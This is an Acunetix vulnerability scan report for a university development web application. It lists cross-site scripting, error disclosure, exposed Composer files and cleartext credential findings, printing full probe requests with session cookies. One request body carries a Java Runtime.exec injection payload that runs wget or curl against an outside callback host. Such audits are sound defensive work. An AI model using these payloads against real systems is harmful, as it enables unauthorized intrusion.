
Developer HTTP Dev Ubk Polindra Ac Id Dashboard

An Acunetix security audit of the dev-ubk.polindra.ac.id site found 31 alerts, including 7 high severity issues. High severity vulnerabilities discovered could allow a malicious user to compromise the backend database or deface the website. Specific issues found include cross-site scripting, exposure of application error messages, disclosure of development configuration files, unencrypted connections, and clear text transmission of user credentials.

Uploaded by

Winda Jayatri

Developer

Report
Acunetix Security Audit

2023-07-30

Generated by Acunetix

Scan of dev-ubk.polindra.ac.id
Scan details
Scan information
Start time 2023-07-29T23:22:50.178384+07:00
Start url http://dev-ubk.polindra.ac.id/dashboard
Host dev-ubk.polindra.ac.id
Scan time 122 minutes, 19 seconds
Profile Full Scan
Server information Apache
Responsive True
Server OS Unknown
Application build 14.7.220401065

Threat level

Acunetix Threat Level 3

One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.

Alerts distribution

Total alerts found 31


High 7
Medium 6
Low 4
Informational 14

Alerts summary

Cross site scripting

Classification
CVSS3
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
CVSS2
Base Score: 6.4
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-79
Affected items Variation
/jurusan/add 1
/kelasdosen/save 2
/ujian/save 4

Application error messages

Classification
CVSS3
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-209
Affected items Variation
Web Server 1

Development configuration files

Classification
CVSS3
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
Base Score: 3.1
Attack Vector: Network
Attack Complexity: High
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-538
Affected items Variation
Web Server 1

Unencrypted connection

Classification

CVSS3
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Base Score: 5.4
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: Low
Availability Impact: None
CVSS2
Base Score: 5.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-319
Affected items Variation
Web Server 1

User credentials are sent in clear text

Classification
CVSS3
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
Base Score: 4.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined

CWE CWE-523
Affected items Variation
Web Server 1

Vulnerable JavaScript libraries

Classification
CVSS3
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Base Score: 6.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: Low
Availability Impact: None
CVSS2
Base Score: 6.4
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-937
Affected items Variation
Web Server 2

Clickjacking: X-Frame-Options header

Classification
CVSS3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
Base Score: 5.8
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
CVSS2
Base Score: 4.3
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: None
Integrity Impact: Partial
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-1021
Affected items Variation
Web Server 1

Composer installed.json publicly accessible

Classification
CVSS3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Base Score: 5.8
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-200
Affected items Variation
Web Server 1

Cookies with missing, inconsistent or contradictory properties

Classification

CVSS3
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-284
Affected items Variation
Web Server 1

Cookies without HttpOnly flag set

Classification
CVSS3
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined

CWE CWE-1004
Affected items Variation
Web Server 1

Content Security Policy (CSP) not implemented

Classification
CVSS3
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-1021
Affected items Variation
Web Server 1

Content type is not specified

Classification
CVSS3
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1

File uploads

Classification
CVSS3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1

No HTTP Redirection

Classification

CVSS3
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1

Outdated JavaScript libraries

Classification
CVSS3
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: High
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: High
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined

CWE CWE-937
Affected items Variation
Web Server 7

Possible server path disclosure (Unix)

Classification
CVSS3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-200
Affected items Variation
Web Server 1

Reverse proxy detected

Classification
CVSS3
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1

Web Application Firewall detected

Classification
CVSS3
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1

Alerts details

Cross site scripting

Severity High
Reported by module /Scripts/PerScheme/XSS.script

Description

Cross-site Scripting (XSS) refers to a client-side code injection attack in which an attacker can execute malicious scripts in
a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user
input within the output it generates.

Impact

Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local
storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then
impersonate that user.

Furthermore, JavaScript can read and make arbitrary modifications to the contents of a page being displayed to a user.
Therefore, XSS in conjunction with some clever social engineering opens up a lot of possibilities for an attacker.

Recommendation

Apply context-dependent encoding and/or validation to user input rendered on a page.

References

Cross-site Scripting (XSS) Attack - Acunetix (https://www.acunetix.com/websitesecurity/cross-site-scripting/)
Types of XSS - Acunetix (https://www.acunetix.com/websitesecurity/xss/)
XSS Filter Evasion Cheat Sheet (https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
Excess XSS, a comprehensive tutorial on cross-site scripting (https://excess-xss.com/)
Cross site scripting (https://en.wikipedia.org/wiki/Cross-site_scripting)

Affected items

/jurusan/add
Details
URL encoded POST input banyak was set to 1<WUFIU1>FBJER[!+!]</WUFIU1>

The input is reflected inside a text element.


Request headers

POST /jurusan/add HTTP/1.1
Referer: http://dev-ubk.polindra.ac.id/dashboard
Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: dev-ubk.polindra.ac.id
Connection: Keep-alive

banyak=1<WUFIU1>FBJER[!%2B!]</WUFIU1>&csrf_test_name=4ed74fb416d4267315513d24ece04ca2&input=

/kelasdosen/save
Details
URL encoded POST input dosen_id was set to 1<WFMGFS>BB6Y0[!+!]</WFMGFS>

The input is reflected inside a text element.


Request headers
POST /kelasdosen/save HTTP/1.1
Referer: http://dev-ubk.polindra.ac.id/dashboard
Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: dev-ubk.polindra.ac.id
Connection: Keep-alive

csrf_test_name=4ed74fb416d4267315513d24ece04ca2&dosen_id=1<WFMGFS>BB6Y0[!%2B!]</WFMGFS>&kelas_id[]=1&method=add

/kelasdosen/save
Details
URL encoded POST input kelas_id[] was set to 1<WNDSMB>JLHRI[!+!]</WNDSMB>

The input is reflected inside a text element.


Request headers
POST /kelasdosen/save HTTP/1.1
Referer: http://dev-ubk.polindra.ac.id/dashboard
Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: dev-ubk.polindra.ac.id
Connection: Keep-alive

csrf_test_name=4ed74fb416d4267315513d24ece04ca2&dosen_id=1&kelas_id[]=1<WNDSMB>JLHRI[!%2B!]</WNDSMB>&method=add

/ujian/save
Details
URL encoded POST input benar was set to 4<W9LYZV>FZV4C[!+!]</W9LYZV>

The input is reflected inside a text element.


Request headers

POST /ujian/save HTTP/1.1
Referer: http://dev-ubk.polindra.ac.id/dashboard
Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
Content-Type: application/x-www-form-urlencoded
Content-Length: 330
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: dev-ubk.polindra.ac.id
Connection: Keep-alive

benar=4<W9LYZV>FZV4C[!%2B!]</W9LYZV>&csrf_test_name=4ed74fb416d4267315513d24ece04ca2&dosen_id=1&jenis=acak&jumlah_soal_1=1&jumlah_soal_2=1&jumlah_soal_3=1&jumlah_soal_4=1&mapel_order_1=1&mapel_order_2=1&mapel_order_3=1&mapel_order_4=1&matkul_id=1&method=add&nama_ujian=1&salah=-1&tgl_mulai=1&tgl_selesai=1&tidak_terjawab=0&waktu=1

/ujian/save
Details
URL encoded POST input dosen_id was set to 1<WB28WQ>BW43E[!+!]</WB28WQ>

The input is reflected inside a text element.


Request headers

POST /ujian/save HTTP/1.1
Referer: http://dev-ubk.polindra.ac.id/dashboard
Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
Content-Type: application/x-www-form-urlencoded
Content-Length: 330
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: dev-ubk.polindra.ac.id
Connection: Keep-alive

benar=4&csrf_test_name=4ed74fb416d4267315513d24ece04ca2&dosen_id=1<WB28WQ>BW43E[!%2B!]</WB28WQ>&jenis=acak&jumlah_soal_1=1&jumlah_soal_2=1&jumlah_soal_3=1&jumlah_soal_4=1&mapel_order_1=1&mapel_order_2=1&mapel_order_3=1&mapel_order_4=1&matkul_id=1&method=add&nama_ujian=1&salah=-1&tgl_mulai=1&tgl_selesai=1&tidak_terjawab=0&waktu=1

/ujian/save
Details
URL encoded POST input matkul_id was set to 1<WJHBEE>BUKT2[!+!]</WJHBEE>

The input is reflected inside a text element.


Request headers

POST /ujian/save HTTP/1.1
Referer: http://dev-ubk.polindra.ac.id/dashboard
Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
Content-Type: application/x-www-form-urlencoded
Content-Length: 330
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: dev-ubk.polindra.ac.id
Connection: Keep-alive

benar=4&csrf_test_name=4ed74fb416d4267315513d24ece04ca2&dosen_id=1&jenis=acak&jumlah_soal_1=1&jumlah_soal_2=1&jumlah_soal_3=1&jumlah_soal_4=1&mapel_order_1=1&mapel_order_2=1&mapel_order_3=1&mapel_order_4=1&matkul_id=1<WJHBEE>BUKT2[!%2B!]</WJHBEE>&method=add&nama_ujian=1&salah=-1&tgl_mulai=1&tgl_selesai=1&tidak_terjawab=0&waktu=1

/ujian/save
Details
URL encoded POST input salah was set to -1<WHFK7N>0QHPY[!+!]</WHFK7N>

The input is reflected inside a text element.


Request headers

POST /ujian/save HTTP/1.1
Referer: http://dev-ubk.polindra.ac.id/dashboard
Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
Content-Type: application/x-www-form-urlencoded
Content-Length: 330
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: dev-ubk.polindra.ac.id
Connection: Keep-alive

benar=4&csrf_test_name=4ed74fb416d4267315513d24ece04ca2&dosen_id=1&jenis=acak&jumlah_soal_1=1&jumlah_soal_2=1&jumlah_soal_3=1&jumlah_soal_4=1&mapel_order_1=1&mapel_order_2=1&mapel_order_3=1&mapel_order_4=1&matkul_id=1&method=add&nama_ujian=1&salah=-1<WHFK7N>0QHPY[!%2B!]</WHFK7N>&tgl_mulai=1&tgl_selesai=1&tidak_terjawab=0&waktu=1

Application error messages

Severity Medium
Reported by module /Scripts/PerScheme/Error_Message.script

Description

This alert requires manual confirmation

Acunetix found one or more error/warning messages. Application error or warning messages may expose sensitive
information about an application's internal workings to an attacker.
These messages may also contain the location of the file that produced an unhandled exception.
Consult the 'Attack details' section for more information about the affected page(s).

Impact

Error messages may disclose sensitive information which can be used to escalate attacks.

Recommendation

Verify that these page(s) are disclosing error or warning messages and properly configure the application to log errors to a
file instead of displaying the error to the user.

References

PHP Runtime Configuration (https://www.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)
Improper Error Handling (https://www.owasp.org/index.php/Improper_Error_Handling)

Affected items

Web Server
Details
Application error messages:

http://dev-ubk.polindra.ac.id/users/edit_info
Unknown column 'Array' in 'where clause'

http://dev-ubk.polindra.ac.id/ujian/save
Unknown column 'Array' in 'where clause'

Request headers
POST /users/edit_info HTTP/1.1
Referer: http://dev-ubk.polindra.ac.id/dashboard
Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
Content-Type: application/x-www-form-urlencoded
Content-Length: 273
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: dev-ubk.polindra.ac.id
Connection: Keep-alive

csrf_test_name=4ed74fb416d4267315513d24ece04ca2&email=sample%40email.tst&first_name=ooJpiued&id[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('wget+http://hitnumchbgnhd.bxss.me/||curl+http://hitnumchbgnhd.bxss.me/')]=1&last_name=ooJpiued&username=ooJpiued

Development configuration files

Severity Medium
Reported by module /Scripts/PerFolder/Development_Files.script

Description

One or more configuration files (e.g. Vagrantfile, Gemfile, Rakefile, ...) were found. These files may expose sensitive
information that could help a malicious user to prepare more advanced attacks. It's recommended to remove or restrict
access to files of this type on production systems.

Impact

These files may disclose sensitive information. This information can be used to launch further attacks.

Recommendation

Remove or restrict access to all configuration files accessible from the internet.

Affected items

Web Server
Details
Development configuration files:

http://dev-ubk.polindra.ac.id/composer.json

composer.json => Composer configuration file. Composer is a dependency manager for PH

http://dev-ubk.polindra.ac.id/composer.lock

composer.lock => Composer lock file. Composer is a dependency manager for PHP.

Request headers
GET /composer.json HTTP/1.1
Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: dev-ubk.polindra.ac.id
Connection: Keep-alive

Unencrypted connection

Severity Medium
Reported by module /RPA/no_https.js

Description

This scan target was connected to over an unencrypted connection. A potential attacker can intercept and modify data sent
and received from this site.

Impact

Possible information disclosure.

Recommendation

The site should send and receive data over a secure (HTTPS) connection.

Affected items

Web Server
Verified vulnerability
Details

Request headers
GET /assets/dist/js/adminlte.min.js HTTP/1.1
Host: dev-ubk.polindra.ac.id
Pragma: no-cache
Cache-Control: no-cache
accept-language: en-US
accept: */*
cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
Referer: http://dev-ubk.polindra.ac.id/dashboard
Accept-Encoding: gzip,deflate,br
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

User credentials are sent in clear text

Severity Medium
Reported by module /Crawler/12-Crawler_User_Credentials_Plain_Text.js

Description

User credentials are transmitted over an unencrypted channel. This information should always be transferred via an
encrypted channel (HTTPS) to avoid being intercepted by malicious users.

Impact

A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.

Recommendation

Because user credentials are considered sensitive information, they should always be transferred to the server over an
encrypted connection (HTTPS).

Affected items

Web Server
Details

Forms with credentials sent in clear text:

http://dev-ubk.polindra.ac.id/auth

Form name: <empty>
Form action: http://dev-ubk.polindra.ac.id/auth/cek_login
Form method: POST
Password input: pass

Request headers
GET /auth HTTP/1.1
Host: dev-ubk.polindra.ac.id
Pragma: no-cache
Cache-Control: no-cache
upgrade-insecure-requests: 1
accept-language: en-US
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5
Accept-Encoding: gzip,deflate,br
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Vulnerable JavaScript libraries

Severity Medium
Reported by module /Scripts/PerFile/Javascript_Libraries_Audit.script

Description

You are using one or more vulnerable JavaScript libraries. One or more vulnerabilities were reported for this version of the
library. Consult Attack details and Web References for more information about the affected library and the vulnerabilities
that were reported.

Impact

Consult References for more information.

Recommendation

Upgrade to the latest version.

Affected items

Web Server
Verified vulnerability
Details

jQuery 3.2.1
URL: http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/jquery/jquery-3.2.1.min.js
Detection method: The library's name and version were determined based on the file's name, and contents.
Acunetix verified the library version and the associated vulnerabilities with the file's unique syntax fingerprint,
which matched the syntax fingerprint expected by Acunetix.
References:
https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
https://mksben.l0.cm/2020/05/jquery3.5.0-xss.html
https://jquery.com/upgrade-guide/3.5/
https://api.jquery.com/jQuery.htmlPrefilter/

Request headers
GET /assets/dist/auth/vendor/jquery/jquery-3.2.1.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Referer: http://dev-ubk.polindra.ac.id/auth

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Verified vulnerability
Details

jQuery 3.3.1
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/jquery/jquery-3.3.1.min.js
Detection method: The library's name and version were determined based on the file's name, and contents.
